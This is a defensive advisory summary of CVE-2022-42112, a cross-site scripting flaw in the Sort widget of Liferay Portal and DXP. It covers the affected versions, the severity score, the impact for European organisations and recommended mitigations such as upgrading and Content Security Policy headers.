CVE-2022-42112 is a Cross-site Scripting (XSS) vulnerability affecting the Portal Search module's Sort widget in Liferay Portal versions 7.2.0 through 7.4.3.24 and Liferay DXP versions 7.2 before fix pack 19, 7.3 before update 5, and 7.4 before update 25. This vulnerability allows remote attackers with limited privileges (requiring authentication) to inject arbitrary web scripts or HTML by crafting malicious payloads that exploit insufficient input sanitization in the Sort widget. The vulnerability is classified under CWE-79, indicating improper neutralization of input during web page generation. The CVSS v3.1 base score is 5.4 (medium severity), with an attack vector of network (remote), low attack complexity, requiring privileges and user interaction, and impacting confidentiality and integrity with a scope change. Successful exploitation could allow attackers to execute malicious scripts in the context of the victim's browser session, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. However, the vulnerability does not impact availability. No known exploits are currently reported in the wild, and no official patch links are provided in the data, though updates fixing the issue exist in the specified Liferay versions. The vulnerability requires authenticated access and user interaction, limiting its exploitation scope but still posing a significant risk in environments where users have access to the affected portal modules.

For European organizations using Liferay Portal or Liferay DXP within the affected versions, this vulnerability poses a risk primarily to the confidentiality and integrity of user data and sessions. Since Liferay is widely used for enterprise portals, intranets, and customer-facing web applications, exploitation could lead to unauthorized access to sensitive information, session hijacking, or manipulation of portal content. This could result in data breaches, loss of user trust, and compliance issues under GDPR due to exposure of personal data. The requirement for authenticated access reduces the risk of widespread exploitation but does not eliminate it, especially in organizations with large user bases or where user credentials may be compromised. Attackers could leverage this vulnerability to target internal users or partners, potentially escalating attacks within the network. The medium severity score reflects moderate risk, but the impact on confidentiality and integrity in regulated European sectors such as finance, healthcare, and government could be significant.

European organizations should prioritize upgrading Liferay Portal and DXP installations to the fixed versions: at least Liferay Portal 7.4.3.25 or later, and Liferay DXP 7.2 fix pack 19, 7.3 update 5, or 7.4 update 25 and beyond. In the absence of immediate patching, organizations should implement strict input validation and output encoding on the Portal Search module's Sort widget to neutralize malicious scripts. Additionally, applying Content Security Policy (CSP) headers can help mitigate the impact of XSS by restricting the execution of unauthorized scripts. Organizations should also review user privileges to minimize the number of users with access to vulnerable modules and enforce strong authentication mechanisms to reduce the risk of credential compromise. Regular security audits and monitoring for unusual user activity related to the portal can help detect attempted exploitation. Finally, user awareness training about phishing and social engineering can reduce the likelihood of successful attacks requiring user interaction.